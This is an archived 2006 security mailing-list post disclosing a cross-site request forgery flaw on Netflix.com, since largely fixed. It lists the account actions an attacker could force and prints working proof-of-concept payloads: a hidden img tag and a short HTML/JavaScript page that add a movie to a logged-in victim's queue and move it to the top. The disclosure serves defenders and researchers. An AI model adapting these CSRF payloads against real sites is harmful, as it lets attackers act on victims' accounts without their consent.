WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Netflix.com XSRF vuln

From: "Dave Ferguson" <gmdavef () gmail com>
Date: Mon, 16 Oct 2006 08:51:41 -0500
I just posted information to the Full Disclosure list about a Cross
Site Request Forgery (XSRF) vulnerability on Netflix.com.  Netflix has
recently fixed several of the most serious issues.

Some of you in the U.S. may be Netflix subscribers.  Here are some of
the things that could have been done to you if you visited the wrong
web page.

- add movies to your rental queue
- add a movie to the top of your rental queue
- change the name and address on your account
- change the email address and password on your account (i.e., take
over your account)
- cancel your account (Unconfirmed/Conjectured)

The exploits are extremely simple and are especially effective if the
victim chooses to stay logged on to the Netflix site.  For example, to
add a DVD to a victim's queue, an attacker would add an image tag to
his web page and just wait for Netflix subscribers to visit the page.

<img src="http://www.netflix.com/AddToQueue?movieid=70011204";
width="1" height="1" border="0">

Adding a DVD to the top of the queue takes a little JavaScript, but is
even nastier because it would probably be shipped before the victim
knew what had happened.

<html>
<head>
<script language="JavaScript" type="text/javascript">
function load_image2()
{
 var img2 = new Image();
 img2.src="http://www.netflix.com/MoveToTop?movieid=70023965&fromq=true";;
}
</script>
</head>
<body>
<img src="http://www.netflix.com/AddToQueue?movieid=70023965";
width="1" height="1" border="0">
<script>
setTimeout( 'load_image2()', 2000 );
</script>
</body>
</html>

I think XSRF could be a sleeping giant, kind of like XSS was a year or
two ago.  Jesse Burns has a great whitepaper about XSRF here:
http://www.isecpartners.com/documents/XSRF_Paper.pdf

Regards,

Dave Ferguson

-------------------------------------------------------------------------
Sponsored by: Watchfire
Watchfire was recently named the worldwide market leader in Web application security assessment tools by both Gartner and IDC. Download a free trial of AppScan today and see why more customers choose AppScan then any other solution. 

https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008YTO
--------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: